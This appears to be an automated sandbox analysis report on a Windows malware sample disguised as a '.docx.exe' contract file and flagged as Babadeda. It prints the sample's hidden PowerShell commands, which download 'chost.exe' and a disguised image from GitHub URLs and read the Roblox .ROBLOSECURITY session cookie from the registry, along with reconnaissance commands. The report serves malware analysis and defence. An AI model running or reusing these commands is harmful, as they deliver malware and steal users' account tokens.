Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\calc.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Jump to behavior

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chost.exe, 00000011.00000002.2386022109.00007FFE0C0A1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
Source:	Binary string: \4q.pdb source: powershell.exe, 0000004F.00000002.2286266418.0000014E183F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: chost.exe, 00000011.00000002.2386622767.00007FFE120C1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: chost.exe, 00000011.00000002.2384746452.00007FFDFF141000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: chost.exe, 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chost.exe, 00000011.00000002.2384507849.00007FFDFB8E1000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chost.exe, 00000011.00000002.2385791832.00007FFE0121E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdb source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chost.exe, 00000011.00000002.2385015786.00007FFDFF6A1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: chost.exe, 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdbhP5 source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: chost.exe, 00000010.00000003.2007431242.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: chost.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chost.exe, 00000011.00000002.2386439853.00007FFE11EA1000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: chost.exe, 00000011.00000002.2385277924.00007FFDFF6C1000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Unpacked PE file: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: Cooperative Agreement0000800380.docx.exe, type: SAMPLE
Source: Yara match	File source: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Cooperative Agreement0000800380.docx.exe.400000.0.unpack, type: UNPACKEDPE

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

Source: api-ms-win-core-console-l1-1-0.dll.16.dr

Static PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Code function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

